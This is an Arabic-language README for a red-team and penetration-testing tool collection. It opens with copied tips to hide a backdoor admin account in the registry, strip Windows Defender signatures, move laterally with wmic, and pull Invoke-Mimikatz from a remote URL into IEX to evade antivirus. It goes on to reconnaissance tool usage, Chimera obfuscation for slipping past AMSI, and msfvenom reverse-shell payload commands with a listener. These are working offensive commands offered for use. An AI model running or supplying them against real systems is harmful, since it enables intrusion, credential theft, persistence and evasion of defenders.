
مشروع يجمع عدة أدوات اختبار الاختراق
يحتوي هذا المستودع على مجموعة تضم أكثر من 200 أداة ومورد يمكن أن تكون مفيدة لأنشطة الفريق الأحمر.
قد تكون بعض الأدوات مصممة خصيصًا للفريق الأحمر، بينما تكون أخرى عامة الاستخدام ويمكن تكييفها للاستخدام في سياق الفريق الأحمر.
تحذير
المواد الموجودة في هذا المستودع هي لأغراض إعلامية وتعليمية فقط. وليست مخصصة للاستخدام في أي أنشطة غير قانونية.
ملاحظة
إخفاء عناوين قائمة الأدوات باستخدام السهم.
انقر 🔙 للعودة إلى القائمة.
git submodule update --init --recursive
### إضافة مشروع جديد```bash
git submodule add https://github.com/example.git
docs: https://git-scm.com/book/en/v2/Git-Tools-Submodules
تعلم من أعضاء الفريق الأحمر من خلال مجموعة من نصائح اختبار الاختراق كفريق أحمر. تغطي هذه النصائح مجموعة من التكتيكات والأدوات والمنهجيات لتحسين قدراتك في اختبار الاختراق كفريق أحمر.
ملاحظة: جميع النصائح تقريبًا من @Alh4zr3d، فهو ينشر نصائح ممتازة للفريق الأحمر!
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /t REG_DWORD /v alh4zr3d /d 0 /f
**الوصف:** _'إن إنشاء الحسابات محفوف بالمخاطر عند التهرب من الفريق الأزرق، ولكن عند إنشاء مسؤول محلي، استخدم بعض السحر اللطيف في التسجيل لإخفائه.'_
**الائتمان:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)
**الرابط:** [Twitter](https://twitter.com/Alh4zr3d/status/1612913838999113728)
### [🔙](#tool-list)تعطيل Windows Defender عن طريق حذف التوقيعات```bash
"%Program Files%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
الوصف: 'قد يكون الأمر فوضويًا بعض الشيء، لكن إذا كان Windows Defender يسبب لك صداعًا كبيرًا، فبدلاً من تعطيله (وهو ما ينبه المستخدم)، عليك فقط تحييده عن طريق حذف جميع التوقيعات.'
الائتمان: @Alh4zr3d
الرابط: تويتر
reg add HKLM\System\CurrentControlSet\Control\TerminalServer /v fSingleSessionPerUser /d 0 /f
**الوصف:** _'أحيانًا ترغب في تسجيل الدخول إلى مضيف عبر RDP أو ما يشابهه، لكن المستخدم لديه جلسة نشطة. قم بتمكين جلسات متعددة لكل مستخدم.'_
**الائتمان:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)
**الرابط:** [Twitter](https://twitter.com/Alh4zr3d/status/1609954528425558016)
### [🔙](#tool-list)بديل محلي لـ Sysinternals PsExec.exe```bash
wmic.exe /node:10.1.1.1 /user:username /password:pass process call create cmd.exe /c " command "
الوصف: 'هل سئمت من رفع ملف Sysinternals PsExec.exe عند القيام بالحركة الجانبية؟ لدى Windows بديل أفضل مثبت مسبقًا. جرب هذا بدلاً من ذلك.'
المصدر: @GuhnooPlusLinux
الرابط: Twitter
0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect(<tgt_ip>,$)) "Port $ open"} 2>$null
**الوصف:** _'عندما يكون ذلك ممكنًا، استخدم الأدوات المتاحة على الجهاز بدلاً من رفع أدوات جديدة إليه (لعدة أسباب). PowerShell/.NET يساعدان. مثال: ماسح منافذ بسيط في PowerShell.'_
**الإسناد:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)
**الرابط:** [Twitter](https://twitter.com/Alh4zr3d/status/1605060950339588096)
### [🔙](#tool-list)Proxy aware PowerShell DownloadString```bash
$w=(New-Object Net.WebClient);$w.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;IEX $w.DownloadString("<url>")
الوصف: 'معظم المؤسسات الكبيرة تستخدم وكلاء الويب هذه الأيام. مهد التحميل القياسي لـ PowerShell لا يدعم الوكيل. استخدم هذا.'
الائتمان: @Alh4zr3d
الرابط: Twitter
type "C:\Users%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Bookmarks.bak" | findstr /c "name url" | findstr /v "type"
**الوصف:** _'قد تتفاجأ بما يمكنك اكتشافه من الإشارات المرجعية للمستخدم فقط. نقاط النهاية الداخلية التي يمكنه الوصول إليها، على سبيل المثال.'_
**الفضل:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)
**الرابط:** [Twitter](https://twitter.com/Alh4zr3d/status/1595488676389171200)
### [🔙](#tool-list)استعلام سجلات DNS للتعداد```bash
Get-DnsRecord -RecordType A -ZoneName FQDN -Server <server hostname>
الوصف: 'التعداد هو 95% من اللعبة. ومع ذلك، فإن إطلاق الكثير من عمليات المسح لتقييم البيئة يكون صاخبًا جدًا. لماذا لا نسأل فقط خادم DC/DNS عن جميع سجلات DNS؟'
الائتمان: @Alh4zr3d
الرابط: Twitter
Get-CIMInstance -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$.StartMode -eq "Auto" -and $.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
**الوصف:** _'العثور على مسارات الخدمة غير المقتبسة بدون PowerUp'_
**الائتمان:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)
**الرابط:** [تويتر](https://twitter.com/Alh4zr3d/status/1579254955554136064)
### [🔙](#tool-list)تجاوز موجه الأوامر المعطل باستخدام /k```bash
# Win+R (To bring up Run Box)
cmd.exe /k "whoami"
الوصف: 'تم تعطيل موجه الأوامر هذا بواسطة المسؤول...' يمكن عادةً رؤيته في بيئات مثل أجهزة الكمبيوتر العامة (kiosk PCs)، الحل البديل السريع هو استخدام /k عبر مربع تشغيل Windows. سيقوم هذا بتنفيذ الأمر ثم عرض رسالة التقييد، مما يسمح بتنفيذ الأوامر.
الإسناد: Martin Sohn Christensen
الرابط: مدونة
(new-object net.webclient).downloadstring('https://raw.githubusercontent[.]com/BC-SECURITY/Empire/main/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1')|IEX;inv
**الوصف:** _'هل سئمت من قيام Windows Defender بحذف mimikatz.exe؟ جرب هذا بدلاً من ذلك.'_
**الفضل:** [@GuhnooPlusLinux](https://twitter.com/GuhnooPlusLinux)
**الرابط:** [Twitter](https://twitter.com/GuhnooPlusLinux/status/1605629049660809216)
### [🔙](#tool-list)تحقق مما إذا كنت في جهاز افتراضي```bash
reg query HKLM\SYSTEM /s | findstr /S "VirtualBox VBOX VMWare"
الوصف: 'هل تريد معرفة إذا كنت داخل جهاز افتراضي؟ استعلم عن مفاتيح التسجيل واكتشف!!! إذا ظهرت أي نتائج فأنت داخل جهاز افتراضي.'
المصدر: @dmcxblue
الرابط: تويتر
(Get-AppLockerPolicy -Local).RuleCollections
Get-ChildItem -Path HKLM:Software\Policies\Microsoft\Windows\SrpV2 -Recurse
reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2\Exe\
**الوصف:** _'يمكن أن يكون AppLocker مزعجًا. قم بالاستكشاف لترى مدى الإزعاج'_
**رصيد:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)
**رابط:** [تويتر](https://twitter.com/alh4zr3d/status/1614706476412698624)
# الاستطلاع
### [🔙](#tool-list)crt.sh -> httprobe -> EyeWitness
لقد قمت بتجميع أمر bash بسطر واحد يقوم بـ:
- جمع قائمة بالنطاقات الفرعية بشكل سلبي من ارتباطات الشهادات ([crt.sh](https://crt.sh/))
- طلب كل نطاق فرعي بشكل نشط للتحقق من وجوده ([httprobe](https://github.com/tomnomnom/httprobe))
- التقاط لقطة شاشة لكل نطاق فرعي للمراجعة اليدوية ([EyeWitness](https://github.com/FortyNorthSecurity/EyeWitness))
**الاستخدام:**```bash
domain=DOMAIN_COM;rand=$RANDOM;curl -fsSL "https://crt.sh/?q=${domain}" | pup 'td text{}' | grep "${domain}" | sort -n | uniq | httprobe > /tmp/enum_tmp_${rand}.txt; python3 /usr/share/eyewitness/EyeWitness.py -f /tmp/enum_tmp_${rand}.txt --web
ملاحظة: يجب أن يكون لديك httprobe و pup و EyeWitness مثبتة وتغيير 'DOMAIN_COM' إلى النطاق المستهدف. يمكنك تشغيل هذا السكربت في نوافذ طرفية متزامنة إذا كان لديك عدة نطاقات جذرية مستهدفة.


إشارة مرجعية جافاسكريبت لاستخراج جميع روابط نقاط النهاية في صفحة ويب.
تم إنشاؤه بواسطة @renniepak، يمكن استخدام مقتطف كود جافاسكريبت هذا لاستخراج جميع نقاط النهاية (التي تبدأ بـ /) من DOM صفحة الويب الحالية بما في ذلك جميع مصادر السكربتات الخارجية المضمنة في الصفحة.```javascript
javascript: (function () {
var scripts = document.getElementsByTagName("script"),
regex = /(?<=("|'|`))/[a-zA-Z0-9_?&=/-#.]*(?=("|'|`))/g;
const results = new Set();
for (var i = 0; i < scripts.length; i++) {
var t = scripts[i].src;
"" != t &&
fetch(t)
.then(function (t) {
return t.text();
})
.then(function (t) {
var e = t.matchAll(regex);
for (let r of e) results.add(r[0]);
})
.catch(function (t) {
console.log("An error occurred: ", t);
});
}
var pageContent = document.documentElement.outerHTML,
matches = pageContent.matchAll(regex);
for (const match of matches) results.add(match[0]);
function writeResults() {
results.forEach(function (t) {
document.write(t + "
");
});
}
setTimeout(writeResults, 3e3);
})();
**الاستخدام (الإشارة المرجعية - Bookmarklet)**
قم بإنشاء إشارة مرجعية...
- `انقر بزر الماوس الأيمن على شريط الإشارات المرجعية`
- `انقر على 'إضافة صفحة'`
- `الصق كود جافاسكريبت أعلاه في مربع 'url'`
- `انقر على 'حفظ'`
...ثم قم بزيارة الصفحة المستهدفة في المتصفح وانقر على الإشارة المرجعية.

**الاستخدام (وحدة التحكم - Console)**
الصق كود جافاسكريبت أعلاه في نافذة وحدة التحكم `F12` واضغط على Enter.

### [🔙](#tool-list)[nuclei](https://github.com/projectdiscovery/nuclei)
ماسح ضوئي سريع للثغرات الأمنية يستخدم قوالب .yaml للبحث عن مشكلات محددة.
**التثبيت:**```bash
go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest
الاستخدام:```bash cat domains.txt | nuclei -t /PATH/nuclei-templates/

### [🔙](#tool-list)[nuclei-templates](https://github.com/projectdiscovery/nuclei-templates.git)
<h1 align="center">
قوالب Nuclei
</h1>
<h4 align="center">قائمة منسقة من القوالب لمحرك nuclei لاكتشاف الثغرات الأمنية في التطبيقات.</h4>
<p align="center">
<a href="https://github.com/projectdiscovery/nuclei-templates/issues"><img src="https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat"></a>
<a href="https://github.com/projectdiscovery/nuclei-templates/releases"><img src="https://img.shields.io/github/release/projectdiscovery/nuclei-templates"></a>
<a href="https://twitter.com/pdnuclei"><img src="https://img.shields.io/twitter/follow/pdnuclei.svg?logo=twitter"></a>
<a href="https://discord.gg/projectdiscovery"><img src="https://img.shields.io/discord/695645237418131507.svg?logo=discord"></a>
</p>
<p align="center">
<a href="https://nuclei.projectdiscovery.io/templating-guide/">الوثائق</a> •
<a href="#-contributions">المساهمات</a> •
<a href="#-discussion">النقاش</a> •
<a href="#-community">المجتمع</a> •
<a href="https://nuclei.projectdiscovery.io/faq/templates/">الأسئلة الشائعة</a> •
<a href="https://discord.gg/projectdiscovery">انضم إلى DC</a>
</p>
---
القوالب هي جوهر [ماسح nuclei](https://github.com/projectdiscovery/nuclei) الذي يحرك محرك المسح الفعلي.
يخزن هذا المستودع ويضم قوالب مختلفة للماسح تم توفيرها من قبل فريقنا، بالإضافة إلى تلك المساهمة من المجتمع.
نأمل أن تساهم أنت أيضًا بإرسال قوالب عبر **طلبات السحب** أو [قضايا Github](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) لتنمية القائمة.
## نظرة عامة على قوالب Nuclei
نظرة عامة على مشروع قوالب nuclei، بما في ذلك إحصائيات حول العلامات الفريدة، المؤلف، الدليل، الخطورة، ونوع القوالب. يحتوي الجدول أدناه على أعلى عشر إحصائيات لكل مصفوفة؛ نسخة موسعة من هذا [متاحة هنا](https://gitlab.com/edu0x01/hack-tools/-/blob/master/TEMPLATES-STATS.md)، ومتاحة أيضًا بتنسيق [JSON](https://gitlab.com/edu0x01/hack-tools/-/blob/master/TEMPLATES-STATS.json) للتكامل.
<table>
<tr>
<td>
## إحصائيات أفضل 10 قوالب Nuclei
| العلامة | العدد | المؤلف | العدد | الدليل | العدد | الخطورة | العدد | النوع | العدد |
| ------------ | ------- | -------------- | ------- | --------------------- | ------- | ---------- | ------- | ----- | ------- |
| cve | 1855 | dhiyaneshdk | 835 | http | 5860 | info | 2857 | file | 123 |
| panel | 896 | dwisiswant0 | 794 | workflows | 190 | high | 1270 | dns | 18 |
| wordpress | 781 | daffainfo | 664 | file | 123 | medium | 1042 | | |
| exposure | 677 | pikpikcu | 353 | network | 93 | critical | 704 | | |
| wp-plugin | 672 | pdteam | 278 | dns | 18 | low | 216 | | |
| xss | 646 | pussycat0x | 240 | ssl | 12 | unknown | 26 | | |
| osint | 639 | geeknik | 220 | headless | 9 | | | | |
| tech | 602 | ricardomaia | 215 | TEMPLATES-STATS.json | 1 | | | | |
| edb | 596 | ritikchaddha | 210 | contributors.json | 1 | | | | |
| lfi | 548 | 0x_akoko | 179 | cves.json | 1 | | | | |
**404 دليلاً، 6542 ملفًا**.
</td>
</tr>
</table>
## 📖 الوثائق
يرجى الانتقال إلى https://nuclei.projectdiscovery.io للحصول على وثائق مفصلة لـ **بناء** قوالب جديدة أو **مخصصة** خاصة بك.
لقد أضفنا أيضًا مجموعة من القوالب لمساعدتك على فهم كيفية عمل الأمور.
## 💪 المساهمات
يتم تشغيل قوالب nuclei بفضل المساهمات الكبيرة من المجتمع.
[مساهمات القوالب](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+)، [طلبات الميزات](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) و [تقارير الأخطاء](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) مرحب بها أكثر من أي وقت مضى.

## 💬 النقاش
هل لديك أسئلة / شكوك / أفكار للمناقشة؟
لا تتردد في فتح نقاش على لوحة [مناقشات Github](https://github.com/projectdiscovery/nuclei-templates/discussions).
## 👨💻 المجتمع
أنت مدعوم للانضمام إلى [مجتمع Discord النشط](https://discord.gg/projectdiscovery) لمناقشة الأمور مباشرة مع القائمين على المشروع ومشاركة الأشياء مع الآخرين حول الأمان والأتمتة.
بالإضافة إلى ذلك، يمكنك متابعتنا على [Twitter](https://twitter.com/pdnuclei) لتبقى على اطلاع بكل ما يتعلق بـ Nuclei.
<p align="center">
<a href="https://github.com/projectdiscovery/nuclei-templates/graphs/contributors">
<img src="https://contrib.rocks/image?repo=projectdiscovery/nuclei-templates&max=300">
</a>
</p>
شكرًا مرة أخرى على مساهمتك والحفاظ على حيوية هذا المجتمع. :heart:
### [🔙](#tool-list)[certSniff](https://github.com/A-poc/certSniff)
certSniff هي أداة مراقبة كلمات مفتاحية لسجلات شهادات SSL مطبقة بلغة Python. تستخدم مكتبة certstream لمراقبة سجلات إنشاء الشهادات التي تحتوي على كلمات مفتاحية محددة في ملف.
يمكنك تشغيلها بعدة كلمات مفتاحية تتعلق بالمجال الهدف، حيث سيتم تسجيل أي إنشاء شهادات قد يؤدي إلى اكتشاف مجالات لم تكن على علم بها من قبل.
**التثبيت:**```bash
git clone https://github.com/A-poc/certSniff;cd certSniff/;pip install -r requirements.txt
الاستخدام:```python python3 certSniff.py -f example.txt

### [🔙](#tool-list)[gobuster](https://www.kali.org/tools/gobuster/)
أداة رائعة لاختراق (تخمين) مسارات الملفات/المجلدات على موقع ضحية.
**التثبيت:**```bash
sudo apt install gobuster
الاستخدام:```bash gobuster dir -u "https://google.com" -w /usr/share/wordlists/dirb/big.txt --wildcard -b 301,401,403,404,500 -t 20

### [🔙](#tool-list)[feroxbuster](https://github.com/epi052/feroxbuster)
أداة مصممة لتنفيذ التصفح القسري، وهو هجوم يهدف فيه المهاجم إلى تعداد والوصول إلى الموارد التي لا يتم الإشارة إليها من قِبل تطبيق الويب، ولكنها لا تزال قابلة للوصول من قِبل المهاجم.
يستخدم Feroxbuster القوة الغاشمة مع قائمة كلمات للبحث عن محتوى غير مرتبط في الدلائل المستهدفة. قد تخزن هذه الموارد معلومات حساسة حول تطبيقات الويب والأنظمة التشغيلية، مثل الكود المصدري وبيانات الاعتماد وعناوين الشبكة الداخلية، وما إلى ذلك...
**تثبيت: (Kali)**```bash
sudo apt update && sudo apt install -y feroxbuster
تثبيت: (Mac)```bash curl -sL https://raw.githubusercontent.com/epi052/feroxbuster/master/install-nix.sh | bash
**تثبيت: (Windows)**```bash
Invoke-WebRequest https://github.com/epi052/feroxbuster/releases/latest/download/x86_64-windows-feroxbuster.exe.zip -OutFile feroxbuster.zip
Expand-Archive .\feroxbuster.zip
.\feroxbuster\feroxbuster.exe -V
للحصول على تعليمات التثبيت الكاملة، راجع هنا.
الاستخدام:```bash
./feroxbuster -u http://127.1 -x pdf -x js,html -x php txt json,docx
./feroxbuster -u http://127.1 -H Accept:application/json "Authorization: Bearer {token}"
cat targets | ./feroxbuster --stdin --silent -s 200 301 302 --redirects -x js | fff -s 200 -o js-files
./feroxbuster -u http://127.1 --insecure --proxy http://127.0.0.1:8080
يمكن العثور على أمثلة الاستخدام الكاملة [هنا](https://epi052.github.io/feroxbuster-docs/docs/examples/).

_الصورة مستخدمة من https://raw.githubusercontent.com/epi052/feroxbuster/main/img/demo.gif_
### [🔙](#tool-list)[CloudBrute](https://github.com/0xsha/CloudBrute)
أداة للعثور على البنية التحتية والملفات والتطبيقات الخاصة بشركة (هدف) على مزودي الخدمات السحابية الرائدين (أمازون، جوجل، مايكروسوفت، ديجيتال أوشن، علي بابا، فولتر، لينود).
الميزات:
- كشف السحابة (IPINFO API ورمز المصدر)
- سريع (متزامن)
- متعدد المنصات (ويندوز، لينكس، ماك)
- عشوائية وكيل المستخدم
- عشوائية الوكيل (HTTP, Socks5)
**تثبيت:**
حمّل أحدث [إصدار](https://github.com/0xsha/CloudBrute/releases) لنظامك واتبع التعليمات.
**الاستخدام:**```bash
# Specified target, generate keywords based off 'target', 80 threads with a timeout of 10, wordlist 'storage_small.txt'
CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt"
# Output results to file
CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w -c amazon -o target_output.txt

الصورة مستخدمة من https://github.com/0xsha/CloudBrute
dnsrecon هي أداة pyhton لتعداد سجلات DNS (MX, SOA, NS, A, AAAA, SPF و TXT) ويمكنها توفير عدد من مضيفي الضحايا المرتبطين الجدد للانتقال إليهم من بحث نطاق واحد.
التثبيت:```bash sudo apt install dnsrecon
**الاستخدام:**```bash
dnsrecon -d google.com

يقوم Shodan بمسح البنية التحتية العامة ويعرضها بشكل قابل للبحث. باستخدام اسم شركة، اسم نطاق، عنوان IP، من الممكن اكتشاف أنظمة قد تكون ضعيفة تتعلق بهدفك عبر shodan.

أداة لتعداد النطاقات الفرعية، تعداد DNS، كشف WAF، WHOIS، فحص المنافذ، wayback machine، جمع البريد الإلكتروني.
تثبيت:```bash git clone https://github.com/D3Ext/AORT; cd AORT; pip3 install -r requirements.txt
**الاستخدام:**```python
python3 AORT.py -d google.com

برنامج يتحقق مما إذا كان يمكن انتحال نطاق معين. يفحص البرنامج سجلات SPF و DMARC بحثًا عن إعدادات ضعيفة تسمح بالانتحال. بالإضافة إلى ذلك، سينبه إذا كان النطاق يحتوي على إعدادات DMARC ترسل رسائل بريد إلكتروني أو طلبات HTTP عند فشل رسائل SPF/DKIM.
يمكن انتحال النطاقات إذا تحقق أي من الشروط التالية:
~all أو -all مطلقًاp=none أو غير موجودةتثبيت:```bash git clone https://github.com/BishopFox/spoofcheck; cd spoofcheck; pip install -r requirements.txt
**الاستخدام:**```bash
./spoofcheck.py [DOMAIN]

AWSBucketDump هي أداة لتعداد دلائل S3 في AWS بسرعة بحثاً عن الملفات المثيرة للاهتمام. تشبه أداة تخمين النطاقات الفرعية لكنها مصممة خصيصاً لدلائل S3 كما تحتوي على ميزات إضافية تسمح بالبحث عن الملفات وتنزيلها.
التثبيت:``` git clone https://github.com/jordanpotti/AWSBucketDump; cd AWSBucketDump; pip install -r requirements.txt
**الاستخدام:**```
usage: AWSBucketDump.py [-h] [-D] [-t THREADS] -l HOSTLIST [-g GREPWORDS] [-m MAXSIZE]
optional arguments:
-h, --help show this help message and exit
-D Download files. This requires significant diskspace
-d If set to 1 or True, create directories for each host w/ results
-t THREADS number of threads
-l HOSTLIST
-g GREPWORDS Provide a wordlist to grep for
-m MAXSIZE Maximum file size to download.
python AWSBucketDump.py -l BucketNames.txt -g interesting_Keywords.txt -D -m 500000 -d 1
أداة رائعة للعثور على المعلومات من GitHub باستخدام التعبيرات المنتظمة (regex)، مع إمكانية البحث عن مستخدمين و/أو مشاريع محددة على GitHub.
التثبيت:``` git clone https://github.com/metac0rtex/GitHarvester; cd GitHarvester
**الاستخدام:**```
./githarvester.py
TruffleHog هي أداة تقوم بمسح مستودعات git والبحث عن سلاسل عالية الإنتروبيا وأنماط قد تشير إلى وجود أسرار، مثل كلمات المرور ومفاتيح API. باستخدام TruffleHog، يمكنك العثور بسرعة وسهولة على المعلومات الحساسة التي قد تم إرسالها ودفعها عن طريق الخطأ إلى مستودع.
التثبيت (الملفات الثنائية): Link
التثبيت (Go):``` git clone https://github.com/trufflesecurity/trufflehog.git; cd trufflehog; go install
**الاستخدام:**```
trufflehog https://github.com/trufflesecurity/test_keys

Dismap هي أداة اكتشاف وتحديد الأصول. يمكنها التعرف بسرعة على البروتوكولات ومعلومات البصمات مثل web/tcp/udp، وتحديد أنواع الأصول، وهي مناسبة للشبكات الداخلية والخارجية.
تمتلك Dismap قاعدة بصمات كاملة، تتضمن حاليًا بصمات بروتوكولات tcp/udp/tls وأكثر من 4500 قاعدة بصمة ويب، والتي يمكنها التعرف على favicon وbody وheader وغيرها.
التثبيت:
Dismap هو ملف ثنائي لأنظمة Linux وMacOS وWindows. انتقل إلى Release لتنزيل الإصدار المناسب وتشغيله:```bash
chmod +x dismap-0.3-linux-amd64 ./dismap-0.3-linux-amd64 -h
dismap-0.3-windows-amd64.exe -h
**الاستخدام:**```bash
# Scan 192.168.1.1 subnet
./dismap -i 192.168.1.1/24
# Scan, output to result.txt and json output to result.json
./dismap -i 192.168.1.1/24 -o result.txt -j result.json
# Scan, Not use ICMP/PING to detect surviving hosts, timeout 10 seconds
./dismap -i 192.168.1.1/24 --np --timeout 10
# Scan, Number of concurrent threads 1000
./dismap -i 192.168.1.1/24 -t 1000

الصورة مستخدمة من https://github.com/zhzyker/dismap
أداة لجمع المعلومات من أنظمة Windows و Samba.
يمكن استخدامها لجمع مجموعة واسعة من المعلومات، بما في ذلك:
التثبيت: (Apt)```bash sudo apt install enum4linux
**تثبيت: (Git)**```bash
git clone https://github.com/CiscoCXSecurity/enum4linux
cd enum4linux
الاستخدام:```bash
enum4linux.pl -a 192.168.2.55
enum4linux.pl -U 192.168.2.55
enum4linux.pl -u administrator -p password -U 192.168.2.55
enum4linux.pl -G 192.168.2.55
enum4linux.pl -v 192.168.2.55
يمكن العثور على معلومات الاستخدام الكاملة في هذه [المدونة](https://labs.portcullis.co.uk/tools/enum4linux/).

_الصورة مستخدمة من https://allabouttesting.org/samba-enumeration-for-penetration-testing-short-tutorial/_
### [🔙](#tool-list)[skanuvaty](https://github.com/Esc4iCEscEsc/skanuvaty)
ماسح dns/شبكة/منافذ سريع بشكل خطير، تم إنشاؤه بواسطة [Esc4iCEscEsc](https://github.com/Esc4iCEscEsc)، مكتوب بلغة Rust.
ستحتاج إلى ملف نطاقات فرعية. _مثل [قائمة كلمات النطاقات الفرعية بواسطة Sublist3r](https://raw.githubusercontent.com/aboul3la/Sublist3r/master/subbrute/names.txt)_.
**التثبيت:**
قم بتنزيل أحدث إصدار من [هنا](https://github.com/Esc4iCEscEsc/skanuvaty/releases).```bash
# Install a wordlist
sudo apt install wordlists
ls /usr/share/dirb/wordlists
ls /usr/share/amass/wordlists
الاستخدام:```bash skanuvaty --target example.com --concurrency 16 --subdomains-file SUBDOMAIN_WORDLIST.txt

_صورة مستخدمة من https://github.com/Esc4iCEscEsc/skanuvaty_
### [🔙](#tool-list)[Metabigor](https://github.com/j3ssie/metabigor)
Metabigor هي أداة استخبارات، هدفها القيام بمهام OSINT والمزيد ولكن بدون أي مفتاح API.
**الميزات الرئيسية:**
- البحث عن معلومات حول عنوان IP و ASN والمؤسسة.
- غلاف لتشغيل rustscan و masscan و nmap بكفاءة أعلى على IP/CIDR.
- العثور على المزيد من النطاقات ذات الصلة بالهدف من خلال تطبيق تقنيات متنوعة (شهادة، whois، Google Analytics، إلخ).
- الحصول على ملخص حول عنوان IP (مقدم من [@thebl4ckturtle](https://github.com/theblackturtle))
**التثبيت:**```bash
go install github.com/j3ssie/metabigor@latest
الاستخدام:```bash
echo "company" | metabigor net --org -o /tmp/result.txt
echo 'Target Inc' | metabigor cert --json | jq -r '.Domain' | unfurl format %r.%t | sort -u # this is old command
echo '1.2.3.4/24' | metabigor scan -o result.txt
echo 'example.com' | metabigor related -s 'whois'
echo 'https://example.com' | metabigor related -s 'google-analytic'

_الصورة مستخدمة من https://github.com/j3ssie/metabigor_
### [🔙](#tool-list)[Gitrob](https://github.com/michenriksen/gitrob)
Gitrob هي أداة للمساعدة في العثور على الملفات الحساسة المحتملة التي تم دفعها إلى المستودعات العامة على Github.
ستقوم Gitrob باستنساخ المستودعات التابعة لمستخدم أو منظمة إلى عمق قابل للتكوين وتتكرر من خلال تاريخ الالتزامات وتضع علامات على الملفات التي تطابق التوقيعات للملفات الحساسة المحتملة.
سيتم عرض النتائج من خلال واجهة ويب لسهولة التصفح والتحليل.
**ملاحظة:** _ستحتاج Gitrob إلى رمز وصول Github للتفاعل مع واجهة برمجة تطبيقات Github. [أنشئ رمز وصول شخصي](https://help.github.com/articles/creating-a-personal-access-token-for-the-command-line/) واحفظه في متغير بيئة في ملف .bashrc الخاص بك أو ملف تكوين صدفة مشابه:_```bash
export GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef
تثبيت: (Go)```bash go get github.com/michenriksen/gitrob
**التثبيت: (ثنائي)**
[إصدار مُجمّع مسبقًا](https://github.com/michenriksen/gitrob/releases) متاح لكل إصدار.
**الاستخدام:**```bash
# Run against org
gitrob {org_name}
# Saving session to a file
gitrob -save ~/gitrob-session.json acmecorp
# Loading session from a file
gitrob -load ~/gitrob-session.json

الصورة مستخدمة من https://www.uedbox.com/post/58828/
Gowitness هي أداة لالتقاط لقطات شاشة لمواقع الويب مكتوبة بلغة Go، وتستخدم Chrome Headless لإنشاء لقطات شاشة لواجهات الويب من خلال سطر الأوامر، مع عارض تقارير مفيد لمعالجة النتائج. يتم دعم كل من Linux و macOS، مع دعم Windows بشكل شبه كامل.
التثبيت: (Go)```bash go install github.com/sensepost/gowitness@latest
يمكن العثور على معلومات التثبيت الكاملة [هنا](https://github.com/sensepost/gowitness/wiki/Installation).
**الاستخدام:**```bash
# Screenshot a single website
gowitness single https://www.google.com/
# Screenshot a cidr using 20 threads
gowitness scan --cidr 192.168.0.0/24 --threads 20
# Screenshot open http services from an namp file
gowitness nmap -f nmap.xml --open --service-contains http
# Run the report server
gowitness report serve
يمكن العثور على معلومات الاستخدام الكاملة هنا.

الصورة مستخدمة من https://github.com/sensepost/gowitness
Chimera هي أداة إخفاء لـ PowerShell مصممة لتجاوز حلول AMSI ومكافحة الفيروسات. تقوم بمعالجة ملفات PS1 الضارة المعروفة بإثارة برامج مكافحة الفيروسات وتستخدم استبدال السلسلة وربط المتغيرات لتجنب توقيعات الكشف الشائعة.
التثبيت:```bash sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git sudo git clone https://github.com/tokyoneon/chimera /opt/chimera sudo chown $USER:$USER -R /opt/chimera/; cd /opt/chimera/ sudo chmod +x chimera.sh; ./chimera.sh --help
**الاستخدام:**```bash
./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -l 3 -o /tmp/chimera.ps1 -v -t powershell,windows,\
copyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,\
invoke-expression,out-string,write-error -j -g -k -r -p

Msfvenom يتيح إنشاء الحمولات لأنظمة تشغيل مختلفة في نطاق واسع من التنسيقات. كما يدعم إخفاء الحمولات لتجاوز برامج مكافحة الفيروسات.
إعداد المستمع```shell use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST your-ip set LPORT listening-port run
#### أوامر Msfvenom
**PHP:**```bash
msfvenom -p php/meterpreter/reverse_tcp lhost =192.168.0.9 lport=1234 R
ويندوز:```bash msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f exe > shell-x86.exe
**Linux:**```bash
msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
Java:```bash msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp
**HTA:**```bash
msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f hta-psh > shell.hta

Shellter هي أداة ديناميكية لحقن شيل كود، وأول أداة حقن ديناميكية حقيقية لملفات PE.
يمكن استخدامها لحقن شيل كود في تطبيقات ويندوز الأصلية (حاليًا لتطبيقات 32 بت فقط).
